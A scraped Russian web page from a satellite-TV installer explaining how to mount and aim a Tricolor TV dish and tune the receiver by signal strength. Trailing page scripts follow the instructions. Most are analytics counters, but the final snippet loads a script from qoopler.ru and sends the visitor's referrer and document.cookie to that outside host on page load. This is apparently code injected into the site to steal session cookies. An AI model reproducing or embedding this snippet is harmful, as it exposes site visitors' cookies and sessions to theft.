Настройка спутника триколор
+7(495) 776-73-79 9:00 - 22:00 | Без выходных

Настройка спутника триколор

Спутниковое телевидение Триколор ТВ — одно из самых распространенных. Его популярности способствует как высокое качество приемки, так и низкая стоимость оборудования. Также покупателям удобно делать заказ через интернет.

02A8BFF4E0FF9C8DD0485326CE1534F7914B5BFE9CFAC41B79pimgpsh fullsize distr


Настройка спутника Триколор — процесс, требующий внимательности и пошагового выполнения инструкций. Если вы решили сэкономить на установке и хотите самостоятельно осуществить все работы, мы предлагаем вам подробную инструкцию.

Настройка спутника Триколор зависит от расположения антенны, по отношению к спутнику. Например, EUTELSAT W4 находится на юге, поэтому направлять антенну нужно именно в эту сторону. В солнечную погоду положение можно определить по солнцу, в пасмурную лучше воспользоваться компасом (который в непосредственной близости к арматуре и металлическим объектам может «привирать»). Проще всего оглядеться по сторонам и скопировать положение тарелки у соседей. Но и тут никто не может гарантировать высокое качество сигнала, и антенну все равно придется подкручивать.

Не нужно крепить оборудование под козырьком крыши, за стеклом, а также в местах, где воображаемый луч приема пересекают насаждения и соседние дома. Установку тарелки лучше всего делать на крышах, на стенах технических построек и лифтовых шахт, а если окна выходят в южном направлении, то крепление можно расположить на стене возле окна, или на внешней стороне балкона.



Собирать антенну нужно в точном соответствии с инструкцией. После сборки закрепите кронштейн в выбранном месте. Все крепежные элементы подбираются в зависимости от материала, из которого сделаны стены, а также от ветровой нагрузки. В общем, лучше один раз «переусердствовать», чем в обозримом будущем искать оторванную ветром (и скорее всего не пригодную к дальнейшему использованию) тарелку где-то на улице.

8897203494FED32A03DAF0CB99C80118478905A962E93800C5pimgpsh fullsize distr


Настройка спутника Триколор начинается с закрепления тарелки на кронштейне в нужном направлении. Гайки затягивают достаточно плотно, но так, чтобы вы могли с небольшим усилием регулировать положение зеркала антенны по вертикали и горизонтали. Произведите подключение оборудования (ресивера, телевизора).

Настройка спутника Триколор:

- Первый шаг — это выставление угла места и азимута. Данные для направления можно взять из специальных таблиц. Азимут достаточно легко определяется с помощью компаса.

- Далее очень медленно вращаем антенну на 1 градус вверх-вниз до появления четкой картинки на экране телевизора. Причем после каждого движения необходимо подождать около 5-ти секунд, пока отраженный сигнал дойдет через ресивер на экран ТВ.

- Перейдите в меню ресивера в пункт, где отображается уровень сигнала. Если на шкале менее 70%, то путем осторожного перемещения тарелки нужно добиться максимального заполнения шкал. Качество приема может быть нарушено из-за сильной облачности, непогоды, налипшего снега.

- Не прекращая контролировать уровень сигнала, затяните регулировочные гайки.

- Зарегистрируйте ваше оборудование.

На этом настройка Триколор окончена. Хотелось бы добавить, что все-таки мы не рекомендуем заниматься установкой и настройкой спутникового ТВ самостоятельно. Во-первых, привлечение специалистов обезопасит вас от несчастного случая, а во-вторых, сэкономит время и нервы.

(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter32184314 = new Ya.Metrika({ id:32184314, clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); type="text/j-avascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24167089 = new Ya.Metrika({id:24167089, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-68618183-1', 'auto'); ga('send', 'pageview'); try { var yaCounter37438800 = new Ya.Metrika({ id:37438800, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/j-avascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window);